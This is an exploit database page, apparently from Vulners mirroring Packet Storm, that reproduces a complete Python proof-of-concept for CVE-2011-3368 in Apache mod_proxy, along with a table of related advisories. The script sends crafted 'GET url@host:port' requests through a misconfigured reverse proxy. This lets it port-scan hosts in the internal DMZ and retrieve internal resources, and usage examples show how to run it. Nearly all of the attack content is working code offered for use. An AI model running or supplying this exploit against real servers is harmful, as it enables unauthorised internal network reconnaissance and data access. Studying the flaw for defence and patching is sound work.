Vulners
Lucene search
Apache mod_proxy Proof Of Concept
🗓️ 11 Oct 2011 00:00:00Reported by Rodrigo MarcosType 
packetstorm🔗 packetstormsecurity.com👁 453 Views
| Reporter | Title | Published | Views | Family All 183 |
|---|---|---|---|---|
 | Security fix for the ALT Linux 8 package apache2 version 2.2.21-alt2 | 19 Nov 201100:00 | – | altlinux |
| Security fix for the ALT Linux 9 package apache2 version 2.2.22-alt1 | 2 Feb 201200:00 | – | altlinux |
| Security fix for the ALT Linux 10 package apache2 version 2.2.21-alt2 | 19 Nov 201100:00 | – | altlinux |
| Security fix for the ALT Linux 9 package apache2 version 2.2.21-alt2 | 19 Nov 201100:00 | – | altlinux |
| Security fix for the ALT Linux 8 package apache2 version 2.2.22-alt1 | 2 Feb 201200:00 | – | altlinux |
| Security fix for the ALT Linux 10 package apache2 version 2.2.22-alt1 | 2 Feb 201200:00 | – | altlinux |
 | Apache mod_proxy Reverse Proxy Exposure Vulnerability PoC | 10 Oct 201100:00 | – | zdt |
 | Exploit for CVE-2007-6750 | 27 Jul 202503:38 | – | gitee |
 | Apache 2.2 < 2.2.22 Multiple Vulnerabilities | 6 Feb 201200:00 | – | nessus |
| Mac OS X 10.7 < 10.7.5 Multiple Vulnerabilities | 21 Sep 201200:00 | – | nessus |
10
`#!/usr/bin/env python
import socket
import string
import getopt, sys
known_ports = [0,21,22,23,25,53,69,80,110,137,139,443,445,3306,3389,5432,5900,8080]
def send_request(url, apache_target, apache_port, internal_target, internal_port, resource):
get = "GET " + url + "@" + internal_target + ":" + internal_port + "/" + resource + " HTTP/1.1\r\n"
get = get + "Host: " + apache_target + "\r\n\r\n"
remoteserver = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
remoteserver.settimeout(3)
try:
remoteserver.connect((apache_target, int(apache_port)))
remoteserver.send(get)
return remoteserver.recv(4096)
except:
return ""
def get_banner(result):
return result[string.find(result, "\r\n\r\n")+4:]
def scan_host(url, apache_target, apache_port, internal_target, tested_ports, resource):
print_banner(url, apache_target, apache_port, internal_target, tested_ports, resource)
for port in tested_ports:
port = str(port)
result = send_request(url, apache_target, apache_port, internal_target, port, resource)
if string.find(result,"HTTP/1.1 200")!=-1 or \
string.find(result,"HTTP/1.1 30")!=-1 or \
string.find(result,"HTTP/1.1 502")!=-1:
print "- Open port: " + port + "/TCP"
print get_banner(result)
elif len(result)==0:
print "- Filtered port: " + port + "/TCP"
else:
print "- Closed port: " + port + "/TCP"
def usage():
print
print "CVE-2011-3368 proof of concept by Rodrigo Marcos"
print "http://www.secforce.co.uk"
print
print "usage():"
print "python apache_scan.py [options]"
print
print " [options]"
print " -r: Remote Apache host"
print " -p: Remote Apache port (default is 80)"
print " -u: URL on the remote web server (default is /)"
print " -d: Host in the DMZ (default is 127.0.0.1)"
print " -e: Port in the DMZ (enables 'single port scan')"
print " -g: GET request to the host in the DMZ (default is /)"
print " -h: Help page"
print
print "examples:"
print " - Port scan of the remote host"
print " python apache_scan.py -r www.example.com -u /images/test.gif"
print " - Port scan of a host in the DMZ"
print " python apache_scan.py -r www.example.com -u /images/test.gif -d internalhost.local"
print " - Retrieve a resource from a host in the DMZ"
print " python apache_scan.py -r www.example.com -u /images/test.gif -d internalhost.local -e 80 -g /accounts/index.html"
print
def print_banner(url, apache_target, apache_port, internal_target, tested_ports, resource):
print
print "CVE-2011-3368 proof of concept by Rodrigo Marcos"
print "http://www.secforce.co.uk"
print
print " [+] Target: " + apache_target
print " [+] Target port: " + apache_port
print " [+] Internal host: " + internal_target
print " [+] Tested ports: " + str(tested_ports)
print " [+] Internal resource: " + resource
print
def main():
global apache_target
global apache_port
global url
global internal_target
global internal_port
global resource
try:
opts, args = getopt.getopt(sys.argv[1:], "u:r:p:d:e:g:h", ["help"])
except getopt.GetoptError:
usage()
sys.exit(2)
try:
for o, a in opts:
if o in ("-h", "--help"):
usage()
sys.exit(2)
if o == "-u":
url=a
if o == "-r":
apache_target=a
if o == "-p":
apache_port=a
if o == "-d":
internal_target = a
if o == "-e":
internal_port=a
if o == "-g":
resource=a
except getopt.GetoptError:
usage()
sys.exit(2)
if apache_target == "":
usage()
sys.exit(2)
url = "/"
apache_target = ""
apache_port = "80"
internal_target = "127.0.0.1"
internal_port = ""
resource = "/"
main()
if internal_port!="":
tested_ports = [internal_port]
else:
tested_ports = known_ports
scan_host(url, apache_target, apache_port, internal_target, tested_ports, resource)
`
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
11 Oct 2011 00:00Current
9High risk
Vulners AI Score9
EPSS0.76893